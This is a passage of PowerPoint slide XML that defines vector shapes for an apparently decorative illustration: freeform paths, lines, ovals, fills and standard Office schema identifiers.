              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 529"/>
                  <a:gd name="T1" fmla="*/ 0 h 694"/>
                  <a:gd name="T2" fmla="*/ 529 w 529"/>
                  <a:gd name="T3" fmla="*/ 694 h 694"/>
                  <a:gd name="T4" fmla="*/ 0 w 529"/>
                  <a:gd name="T5" fmla="*/ 0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29" h="694">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="529" y="6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9" name="Line 858">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E8A2FBB-2D75-468E-A33F-21CF08FE030D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>
                <a:off x="3418" y="1249"/>
                <a:ext cx="52" cy="6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0" name="Freeform 859">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9FCD3E6-04B1-429B-8A2F-813DD948D88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19" y="1269"/>
                <a:ext cx="51" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 524 w 524"/>
                  <a:gd name="T1" fmla="*/ 0 h 291"/>
                  <a:gd name="T2" fmla="*/ 0 w 524"/>
                  <a:gd name="T3" fmla="*/ 291 h 291"/>
                  <a:gd name="T4" fmla="*/ 524 w 524"/>
                  <a:gd name="T5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24" h="291">
                    <a:moveTo>
                      <a:pt x="524" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="291"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="524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1" name="Line 860">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C167571-5A03-4706-BDCB-3C73B95EA7B2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 flipH="1">
                <a:off x="3419" y="1269"/>
                <a:ext cx="51" cy="2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2" name="Freeform 861">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86886D96-02E9-40B6-B36D-D5F9B6614E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41" y="1249"/>
                <a:ext cx="7" cy="68"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 68 w 68"/>
                  <a:gd name="T1" fmla="*/ 0 h 702"/>
                  <a:gd name="T2" fmla="*/ 0 w 68"/>
                  <a:gd name="T3" fmla="*/ 702 h 702"/>
                  <a:gd name="T4" fmla="*/ 68 w 68"/>
                  <a:gd name="T5" fmla="*/ 0 h 7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702">
                    <a:moveTo>
                      <a:pt x="68" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="70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3" name="Line 862">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECC2B7B7-45DC-4B53-98CE-83647610296D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 flipH="1">
                <a:off x="3441" y="1249"/>
                <a:ext cx="7" cy="6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4" name="Freeform 863">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F73F616-C35D-4374-9C6E-6E4773ECCFE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10" y="1271"/>
                <a:ext cx="69" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 709"/>
                  <a:gd name="T1" fmla="*/ 0 h 245"/>
                  <a:gd name="T2" fmla="*/ 709 w 709"/>
                  <a:gd name="T3" fmla="*/ 245 h 245"/>
                  <a:gd name="T4" fmla="*/ 0 w 709"/>
                  <a:gd name="T5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09" h="245">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="709" y="2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5" name="Line 864">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{004D885D-E834-4DC5-9706-38BB795CC3F9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>
                <a:off x="3410" y="1271"/>
                <a:ext cx="69" cy="24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6" name="Freeform 865">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28C4CADF-A9A2-48F0-9764-91889690724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34" y="1272"/>
                <a:ext cx="20" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 86"/>
                  <a:gd name="T1" fmla="*/ 87 h 98"/>
                  <a:gd name="T2" fmla="*/ 17 w 86"/>
                  <a:gd name="T3" fmla="*/ 69 h 98"/>
                  <a:gd name="T4" fmla="*/ 14 w 86"/>
                  <a:gd name="T5" fmla="*/ 11 h 98"/>
                  <a:gd name="T6" fmla="*/ 69 w 86"/>
                  <a:gd name="T7" fmla="*/ 29 h 98"/>
                  <a:gd name="T8" fmla="*/ 72 w 86"/>
                  <a:gd name="T9" fmla="*/ 8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98">
                    <a:moveTo>
                      <a:pt x="72" y="87"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="57" y="98"/>
                      <a:pt x="33" y="90"/>
                      <a:pt x="17" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="48"/>
                      <a:pt x="0" y="22"/>
                      <a:pt x="14" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="0"/>
                      <a:pt x="53" y="8"/>
                      <a:pt x="69" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="50"/>
                      <a:pt x="86" y="76"/>
                      <a:pt x="72" y="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7" name="Freeform 866">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{146DDA64-227E-4FFE-A28E-9573969B0E2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25" y="1306"/>
                <a:ext cx="120" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1235"/>
                  <a:gd name="T1" fmla="*/ 222 h 333"/>
                  <a:gd name="T2" fmla="*/ 413 w 1235"/>
                  <a:gd name="T3" fmla="*/ 333 h 333"/>
                  <a:gd name="T4" fmla="*/ 1235 w 1235"/>
                  <a:gd name="T5" fmla="*/ 113 h 333"/>
                  <a:gd name="T6" fmla="*/ 819 w 1235"/>
                  <a:gd name="T7" fmla="*/ 0 h 333"/>
                  <a:gd name="T8" fmla="*/ 0 w 1235"/>
                  <a:gd name="T9" fmla="*/ 222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5" h="333">
                    <a:moveTo>
                      <a:pt x="0" y="222"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="413" y="333"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1235" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="222"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="0000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8" name="Freeform 867">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAD22534-501E-4FA1-AE50-325EAA25686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415" y="1292"/>
                <a:ext cx="50" cy="88"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 510"/>
                  <a:gd name="T1" fmla="*/ 0 h 902"/>
                  <a:gd name="T2" fmla="*/ 97 w 510"/>
                  <a:gd name="T3" fmla="*/ 364 h 902"/>
                  <a:gd name="T4" fmla="*/ 0 w 510"/>
                  <a:gd name="T5" fmla="*/ 860 h 902"/>
                  <a:gd name="T6" fmla="*/ 163 w 510"/>
                  <a:gd name="T7" fmla="*/ 902 h 902"/>
                  <a:gd name="T8" fmla="*/ 510 w 510"/>
                  <a:gd name="T9" fmla="*/ 475 h 902"/>
                  <a:gd name="T10" fmla="*/ 342 w 510"/>
                  <a:gd name="T11" fmla="*/ 90 h 902"/>
                  <a:gd name="T12" fmla="*/ 0 w 510"/>
                  <a:gd name="T13" fmla="*/ 0 h 9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0" h="902">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="97" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="902"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="510" y="475"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="9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9" name="Freeform 868">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24DD3474-BD71-45B7-A50F-E9FC4420B7C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71" y="1407"/>
                <a:ext cx="227" cy="208"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 846 w 985"/>
                  <a:gd name="T1" fmla="*/ 481 h 900"/>
                  <a:gd name="T2" fmla="*/ 391 w 985"/>
                  <a:gd name="T3" fmla="*/ 27 h 900"/>
                  <a:gd name="T4" fmla="*/ 353 w 985"/>
                  <a:gd name="T5" fmla="*/ 0 h 900"/>
                  <a:gd name="T6" fmla="*/ 409 w 985"/>
                  <a:gd name="T7" fmla="*/ 81 h 900"/>
                  <a:gd name="T8" fmla="*/ 117 w 985"/>
                  <a:gd name="T9" fmla="*/ 10 h 900"/>
                  <a:gd name="T10" fmla="*/ 0 w 985"/>
                  <a:gd name="T11" fmla="*/ 116 h 900"/>
                  <a:gd name="T12" fmla="*/ 366 w 985"/>
                  <a:gd name="T13" fmla="*/ 691 h 900"/>
                  <a:gd name="T14" fmla="*/ 626 w 985"/>
                  <a:gd name="T15" fmla="*/ 785 h 900"/>
                  <a:gd name="T16" fmla="*/ 731 w 985"/>
                  <a:gd name="T17" fmla="*/ 423 h 900"/>
                  <a:gd name="T18" fmla="*/ 930 w 985"/>
                  <a:gd name="T19" fmla="*/ 702 h 900"/>
                  <a:gd name="T20" fmla="*/ 846 w 985"/>
                  <a:gd name="T21" fmla="*/ 481 h 9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85" h="900">
                    <a:moveTo>
                      <a:pt x="846" y="481"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="391" y="27"/>
                      <a:pt x="391" y="27"/>
                      <a:pt x="391" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="372" y="11"/>
                      <a:pt x="358" y="3"/>
                      <a:pt x="353" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="81"/>
                      <a:pt x="409" y="81"/>
                      <a:pt x="409" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="409" y="81"/>
                      <a:pt x="175" y="10"/>
                      <a:pt x="117" y="10"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="10"/>
                      <a:pt x="0" y="116"/>
                      <a:pt x="0" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="237" y="163"/>
                      <a:pt x="366" y="691"/>
                      <a:pt x="366" y="691"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="508" y="742"/>
                      <a:pt x="611" y="779"/>
                      <a:pt x="626" y="785"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="933" y="900"/>
                      <a:pt x="808" y="548"/>
                      <a:pt x="731" y="423"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="731" y="423"/>
                      <a:pt x="941" y="590"/>
                      <a:pt x="930" y="702"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="930" y="702"/>
                      <a:pt x="985" y="606"/>
                      <a:pt x="846" y="48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100000">
                    <a:srgbClr val="9DC2EB"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="54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0" name="Freeform 869">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5400E7-759A-4C98-A5D5-E76093A38AB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05" y="1402"/>
                <a:ext cx="250" cy="165"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 721 w 1087"/>
                  <a:gd name="T1" fmla="*/ 137 h 712"/>
                  <a:gd name="T2" fmla="*/ 27 w 1087"/>
                  <a:gd name="T3" fmla="*/ 27 h 712"/>
                  <a:gd name="T4" fmla="*/ 72 w 1087"/>
                  <a:gd name="T5" fmla="*/ 338 h 712"/>
                  <a:gd name="T6" fmla="*/ 1087 w 1087"/>
                  <a:gd name="T7" fmla="*/ 712 h 712"/>
                  <a:gd name="T8" fmla="*/ 721 w 1087"/>
                  <a:gd name="T9" fmla="*/ 137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7" h="712">
                    <a:moveTo>
                      <a:pt x="721" y="137"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="721" y="137"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="27" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="54"/>
                      <a:pt x="5" y="306"/>
                      <a:pt x="72" y="338"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="362"/>
                      <a:pt x="728" y="582"/>
                      <a:pt x="1087" y="712"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1087" y="712"/>
                      <a:pt x="958" y="184"/>
                      <a:pt x="721" y="137"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC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1" name="Freeform 870">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A1BA9A-31D1-479A-89D6-7E3F3101A52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05" y="1425"/>
                <a:ext cx="134" cy="131"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 255 w 584"/>
                  <a:gd name="T1" fmla="*/ 49 h 566"/>
                  <a:gd name="T2" fmla="*/ 0 w 584"/>
                  <a:gd name="T3" fmla="*/ 0 h 566"/>
                  <a:gd name="T4" fmla="*/ 0 w 584"/>
                  <a:gd name="T5" fmla="*/ 353 h 566"/>
                  <a:gd name="T6" fmla="*/ 584 w 584"/>
                  <a:gd name="T7" fmla="*/ 566 h 566"/>
                  <a:gd name="T8" fmla="*/ 255 w 584"/>
                  <a:gd name="T9" fmla="*/ 49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4" h="566">
                    <a:moveTo>
                      <a:pt x="255" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="255" y="49"/>
                      <a:pt x="135" y="25"/>
                      <a:pt x="0" y="0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187" y="422"/>
                      <a:pt x="416" y="505"/>
                      <a:pt x="584" y="566"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="584" y="566"/>
                      <a:pt x="468" y="92"/>
                      <a:pt x="255" y="4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100000">
                    <a:srgbClr val="9DC2EB"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="54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2" name="Freeform 871">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D990EFE0-38CA-4F2D-AAF0-8559328F125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14" y="1411"/>
                <a:ext cx="91" cy="96"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 393"/>
                  <a:gd name="T1" fmla="*/ 13 h 416"/>
                  <a:gd name="T2" fmla="*/ 65 w 393"/>
                  <a:gd name="T3" fmla="*/ 293 h 416"/>
                  <a:gd name="T4" fmla="*/ 393 w 393"/>
                  <a:gd name="T5" fmla="*/ 416 h 416"/>
                  <a:gd name="T6" fmla="*/ 393 w 393"/>
                  <a:gd name="T7" fmla="*/ 63 h 416"/>
                  <a:gd name="T8" fmla="*/ 24 w 393"/>
                  <a:gd name="T9" fmla="*/ 13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3" h="416">
                    <a:moveTo>
                      <a:pt x="24" y="13"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="38"/>
                      <a:pt x="5" y="265"/>
                      <a:pt x="65" y="293"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="303"/>
                      <a:pt x="222" y="354"/>
                      <a:pt x="393" y="416"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="393" y="63"/>
                      <a:pt x="393" y="63"/>
                      <a:pt x="393" y="63"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="227" y="32"/>
                      <a:pt x="38" y="0"/>
                      <a:pt x="24" y="1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100000">
                    <a:srgbClr val="9DC2EB"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="54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3" name="Oval 872">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29199819-8BD1-4F77-90C0-88047180E0DF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4005" y="1336"/>
                <a:ext cx="38" cy="1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4" name="Freeform 873">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57B2DF87-AC39-44ED-AE27-442AB8DC323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12" y="1318"/>
                <a:ext cx="24" cy="25"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 52 w 103"/>
                  <a:gd name="T1" fmla="*/ 14 h 111"/>
                  <a:gd name="T2" fmla="*/ 0 w 103"/>
                  <a:gd name="T3" fmla="*/ 0 h 111"/>
                  <a:gd name="T4" fmla="*/ 0 w 103"/>
                  <a:gd name="T5" fmla="*/ 97 h 111"/>
                  <a:gd name="T6" fmla="*/ 52 w 103"/>
                  <a:gd name="T7" fmla="*/ 111 h 111"/>
                  <a:gd name="T8" fmla="*/ 103 w 103"/>
                  <a:gd name="T9" fmla="*/ 97 h 111"/>
                  <a:gd name="T10" fmla="*/ 103 w 103"/>
                  <a:gd name="T11" fmla="*/ 0 h 111"/>
                  <a:gd name="T12" fmla="*/ 52 w 103"/>
                  <a:gd name="T13" fmla="*/ 14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3" h="111">
                    <a:moveTo>
                      <a:pt x="52" y="14"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="14"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0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0" y="105"/>
                      <a:pt x="23" y="111"/>
                      <a:pt x="52" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="111"/>
                      <a:pt x="103" y="105"/>
                      <a:pt x="103" y="97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3" y="7"/>
                      <a:pt x="80" y="14"/>
                      <a:pt x="5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5" name="Oval 874">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4479CDC2-24C6-4C05-8F46-8E6AB7529F0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4012" y="1314"/>
                <a:ext cx="24" cy="7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6" name="Oval 875">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFA7783-F695-460A-AD87-EDF11EEE9A56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4012" y="1314"/>
                <a:ext cx="24" cy="7"/>
              </a:xfrm>
              <a:prstGeom prst="ellips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7" name="Freeform 876">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60C9C5B-C30C-4C1B-88F5-B89565499A9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36" y="1228"/>
                <a:ext cx="371" cy="102"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1610 w 1610"/>
                  <a:gd name="T1" fmla="*/ 17 h 441"/>
                  <a:gd name="T2" fmla="*/ 1545 w 1610"/>
                  <a:gd name="T3" fmla="*/ 0 h 441"/>
                  <a:gd name="T4" fmla="*/ 0 w 1610"/>
                  <a:gd name="T5" fmla="*/ 413 h 441"/>
                  <a:gd name="T6" fmla="*/ 0 w 1610"/>
                  <a:gd name="T7" fmla="*/ 441 h 441"/>
                  <a:gd name="T8" fmla="*/ 1610 w 1610"/>
                  <a:gd name="T9" fmla="*/ 1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0" h="441">
                    <a:moveTo>
                      <a:pt x="1610" y="17"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1545" y="0"/>
                      <a:pt x="1545" y="0"/>
                      <a:pt x="1545" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="929" y="132"/>
                      <a:pt x="173" y="365"/>
                      <a:pt x="0" y="413"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="441"/>
                      <a:pt x="0" y="441"/>
                      <a:pt x="0" y="441"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="471" y="273"/>
                      <a:pt x="1610" y="17"/>
                      <a:pt x="1610" y="17"/>
                    </a:cubicBez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8" name="Freeform 877">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFDE18D2-1AA4-40EF-90FA-BB9E769A99E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37" y="1331"/>
                <a:ext cx="389" cy="107"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1628 w 1689"/>
                  <a:gd name="T1" fmla="*/ 0 h 460"/>
                  <a:gd name="T2" fmla="*/ 0 w 1689"/>
                  <a:gd name="T3" fmla="*/ 441 h 460"/>
                  <a:gd name="T4" fmla="*/ 73 w 1689"/>
                  <a:gd name="T5" fmla="*/ 460 h 460"/>
                  <a:gd name="T6" fmla="*/ 1689 w 1689"/>
                  <a:gd name="T7" fmla="*/ 13 h 460"/>
                  <a:gd name="T8" fmla="*/ 1679 w 1689"/>
                  <a:gd name="T9" fmla="*/ 13 h 460"/>
                  <a:gd name="T10" fmla="*/ 1628 w 1689"/>
                  <a:gd name="T11" fmla="*/ 0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89" h="460">
                    <a:moveTo>
                      <a:pt x="1628" y="0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1033" y="149"/>
                      <a:pt x="1033" y="149"/>
                      <a:pt x="0" y="441"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="460"/>
                      <a:pt x="73" y="460"/>
                      <a:pt x="73" y="460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="635" y="250"/>
                      <a:pt x="1689" y="13"/>
                      <a:pt x="1689" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1688" y="13"/>
                      <a:pt x="1681" y="13"/>
                      <a:pt x="1679" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1652" y="13"/>
                      <a:pt x="1630" y="7"/>
                      <a:pt x="1628" y="0"/>
                    </a:cubicBez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9" name="Freeform 878">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D8C4FCD-993A-4CF0-B414-2805769219A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026" y="1331"/>
                <a:ext cx="382" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1657"/>
                  <a:gd name="T1" fmla="*/ 16 h 451"/>
                  <a:gd name="T2" fmla="*/ 1604 w 1657"/>
                  <a:gd name="T3" fmla="*/ 451 h 451"/>
                  <a:gd name="T4" fmla="*/ 1657 w 1657"/>
                  <a:gd name="T5" fmla="*/ 436 h 451"/>
                  <a:gd name="T6" fmla="*/ 42 w 1657"/>
                  <a:gd name="T7" fmla="*/ 0 h 451"/>
                  <a:gd name="T8" fmla="*/ 42 w 1657"/>
                  <a:gd name="T9" fmla="*/ 2 h 451"/>
                  <a:gd name="T10" fmla="*/ 0 w 1657"/>
                  <a:gd name="T11" fmla="*/ 16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7" h="451">
                    <a:moveTo>
                      <a:pt x="0" y="16"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="495" y="106"/>
                      <a:pt x="1604" y="451"/>
                      <a:pt x="1604" y="451"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1657" y="436"/>
                      <a:pt x="1657" y="436"/>
                      <a:pt x="1657" y="436"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1097" y="261"/>
                      <a:pt x="135" y="24"/>
                      <a:pt x="42" y="0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9"/>
                      <a:pt x="24" y="15"/>
                      <a:pt x="0" y="16"/>
                    </a:cubicBez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0" name="Freeform 879">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E01F4C98-023D-448E-9500-494553229EE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632" y="1228"/>
                <a:ext cx="380" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 64 w 1653"/>
                  <a:gd name="T1" fmla="*/ 0 h 445"/>
                  <a:gd name="T2" fmla="*/ 0 w 1653"/>
                  <a:gd name="T3" fmla="*/ 18 h 445"/>
                  <a:gd name="T4" fmla="*/ 1653 w 1653"/>
                  <a:gd name="T5" fmla="*/ 445 h 445"/>
                  <a:gd name="T6" fmla="*/ 1653 w 1653"/>
                  <a:gd name="T7" fmla="*/ 418 h 445"/>
                  <a:gd name="T8" fmla="*/ 64 w 1653"/>
                  <a:gd name="T9" fmla="*/ 0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53" h="445">
                    <a:moveTo>
                      <a:pt x="64" y="0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687" y="146"/>
                      <a:pt x="1572" y="421"/>
                      <a:pt x="1653" y="445"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1653" y="418"/>
                      <a:pt x="1653" y="418"/>
                      <a:pt x="1653" y="418"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1057" y="250"/>
                      <a:pt x="64" y="0"/>
                      <a:pt x="64" y="0"/>
                    </a:cubicBez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1" name="Oval 880">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{33AA8966-251C-4ECA-9DEF-92CBB3DD27CE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3990" y="1311"/>
                <a:ext cx="68" cy="25"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="11111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668" name="Group 1154">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDD397A5-D6E5-46A2-A7FF-B118D17A69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80230" y="4838174"/>
              <a:ext cx="859932" cy="820905"/>
              <a:chOff x="688" y="1065"/>
              <a:chExt cx="1939" cy="1850"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="791" name="Freeform 1155">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4248F853-CEB0-4BC6-8827-FA8F5734355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88" y="1065"/>
                <a:ext cx="1939" cy="1850"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 4041"/>
                  <a:gd name="T1" fmla="*/ 1084 h 3855"/>
                  <a:gd name="T2" fmla="*/ 0 w 4041"/>
                  <a:gd name="T3" fmla="*/ 3855 h 3855"/>
                  <a:gd name="T4" fmla="*/ 4041 w 4041"/>
                  <a:gd name="T5" fmla="*/ 2770 h 3855"/>
                  <a:gd name="T6" fmla="*/ 4041 w 4041"/>
                  <a:gd name="T7" fmla="*/ 0 h 3855"/>
